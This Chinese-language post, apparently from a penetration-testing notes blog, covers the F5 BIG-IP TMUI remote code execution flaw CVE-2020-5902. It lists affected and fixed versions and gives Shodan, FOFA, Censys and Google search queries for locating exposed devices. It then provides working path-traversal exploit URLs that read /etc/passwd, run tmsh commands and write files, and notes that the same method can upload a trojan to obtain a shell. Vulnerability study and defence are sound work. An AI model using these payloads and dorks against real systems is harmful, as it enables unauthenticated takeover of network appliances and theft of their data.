F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902)

一、漏洞详情

近日,绿盟科技监测到F5官方对流量管理用户界面(TMUI)远程代码执行漏洞(CVE-2020-5902)的安全公告进行了更新。受影响的15.x版本变更为15.0.0-15.1.0,更新了可被绕过的临时缓解措施及验证方法;未经身份验证的攻击者通过BIG-IP管理端口或自身IP访问TMUI,可构造恶意请求获取目标服务器权限,CVSS评分为10分。目前msf已经集成了该漏洞的利用,建议还未修复的用户尽快采取措施进行防护。

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

二、 影响范围

受影响版本
F5 BIG-IP 15.x:15.0.0 - 15.1.0
F5 BIG-IP 14.x:14.1.0 - 14.1.2
F5 BIG-IP 13.x:13.1.0 - 13.1.3
F5 BIG-IP 12.x:12.1.0 - 12.1.5
F5 BIG-IP 11.x:11.6.1 - 11.6.5

不受影响版本
F5 BIG-IP 15.x:15.1.0.4
F5 BIG-IP 14.x:14.1.2.6
F5 BIG-IP 13.x:13.1.3.4
F5 BIG-IP 12.x:12.1.5.2
F5 BIG-IP 11.x:11.6.5.2

三、 环境搭建、网络空间探测

到官网这个页面选择你想要下载的版本:
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v15.x

以下是F5 BIG-IP设备在各大检索平台的检索规则

shodan
http.favicon.hash:-335242539

http.title:“BIG-IP® ;- Redirect”

fofa
title=“BIG-IP® ;- Redirect”

censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5

443.https.get.title:“BIG-IP® ;- Redirect”

google
inurl:“tmui/login.jsp”

intitle:“BIG-IP” inurl:“tmui”

四、漏洞复现

读取文件 Read File

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902)_第1张图片

执行命令 RCE

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902)_第2张图片

写入文件 Upload File & 查看文件内容 File Read

/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/22&content=hello tiger!

读取/tmp/22文件是否写入
F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902)_第3张图片

按照这个思路即可上传木马,getshell。

你可能感兴趣的:(Web安全渗透测试笔记,渗透测试)